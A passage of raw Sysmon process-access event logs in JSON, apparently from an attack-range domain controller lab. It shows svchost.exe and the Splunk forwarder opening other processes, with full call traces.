C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+264a1|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+2669f|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+25c4b|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+27476|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+27db2|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+277c9|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+26100|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:25.470","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-001044B90000}","SourceProcessId":"1140","SourceThreadId":"1084","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-001044C20200}","TargetProcessId":"2904","TargetImage":"C:\\Windows\\system32\\DFSRs.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+264a1|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+2669f|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+25c4b|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+27476|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+27db2|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+277c9|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+26100|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc","EventReceivedTime":"2020-08-01 07:53:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:25","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1844,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:25.470\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-001044B90000}\r\nSourceProcessId: 1140\r\nSourceThreadId: 1084\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-001044C20200}\r\nTargetProcessId: 2904\r\nTargetImage: C:\\Windows\\system32\\DFSRs.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+264a1|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+2669f|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+25c4b|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+27476|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+27db2|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+277c9|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+26100|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:25.470","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-001044B90000}","SourceProcessId":"1140","SourceThreadId":"1084","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-001044C20200}","TargetProcessId":"2904","TargetImage":"C:\\Windows\\system32\\DFSRs.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+264a1|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+2669f|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+25c4b|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+27476|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+27db2|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+277c9|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+26100|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc","EventReceivedTime":"2020-08-01 07:53:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:25","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1845,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:25.470\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-001044B90000}\r\nSourceProcessId: 1140\r\nSourceThreadId: 1084\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-001044C20200}\r\nTargetProcessId: 2904\r\nTargetImage: C:\\Windows\\system32\\DFSRs.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+2597b|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+283dc|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+281af|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+2982c|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+292fb|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+26165|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:25.470","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-001044B90000}","SourceProcessId":"1140","SourceThreadId":"1084","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-001044C20200}","TargetProcessId":"2904","TargetImage":"C:\\Windows\\system32\\DFSRs.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+2597b|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+283dc|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+281af|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+2982c|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+292fb|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+26165|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","EventReceivedTime":"2020-08-01 07:53:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:25","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1846,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:25.470\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-001044B90000}\r\nSourceProcessId: 1140\r\nSourceThreadId: 1084\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-001044C20200}\r\nTargetProcessId: 2904\r\nTargetImage: C:\\Windows\\system32\\DFSRs.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+2a2f2|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+29e26|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+28432|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+281af|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+2982c|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+292fb|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+26165|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:25.470","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-001044B90000}","SourceProcessId":"1140","SourceThreadId":"1084","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-001044C20200}","TargetProcessId":"2904","TargetImage":"C:\\Windows\\system32\\DFSRs.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+2a2f2|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+29e26|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+28432|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+281af|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+2982c|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+292fb|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+26165|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc","EventReceivedTime":"2020-08-01 07:53:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:25","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1847,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:25.470\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-001044B90000}\r\nSourceProcessId: 1140\r\nSourceThreadId: 1084\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-001044C20200}\r\nTargetProcessId: 2904\r\nTargetImage: C:\\Windows\\system32\\DFSRs.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+25d35|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+2619d|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:25.470","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-001044B90000}","SourceProcessId":"1140","SourceThreadId":"1084","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-001044C20200}","TargetProcessId":"2904","TargetImage":"C:\\Windows\\system32\\DFSRs.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+25d35|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+2619d|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029","EventReceivedTime":"2020-08-01 07:53:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:25","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1848,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:25.486\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-001044B90000}\r\nSourceProcessId: 1140\r\nSourceThreadId: 1084\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-001044C20200}\r\nTargetProcessId: 2904\r\nTargetImage: C:\\Windows\\system32\\DFSRs.exe\r\nGrantedAccess: 0x100000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+261b7|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:25.486","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-001044B90000}","SourceProcessId":"1140","SourceThreadId":"1084","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-001044C20200}","TargetProcessId":"2904","TargetImage":"C:\\Windows\\system32\\DFSRs.exe","GrantedAccess":"0x100000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+261b7|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4","EventReceivedTime":"2020-08-01 07:53:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:25","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1849,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:25.642\r\nSourceProcessGUID: {41C8662E-1F75-5F25-0000-001004940300}\r\nSourceProcessId: 8\r\nSourceThreadId: 2580\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-001063C20200}\r\nTargetProcessId: 2488\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f344c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f2a91|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+19fdb50|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:25.642","SourceProcessGUID":"{41C8662E-1F75-5F25-0000-001004940300}","SourceProcessId":"8","SourceThreadId":"2580","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-001063C20200}","TargetProcessId":"2488","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f344c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f2a91|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+19fdb50|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:25","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1850,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:25.674\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-001063C20200}\r\nTargetProcessId: 2488\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: 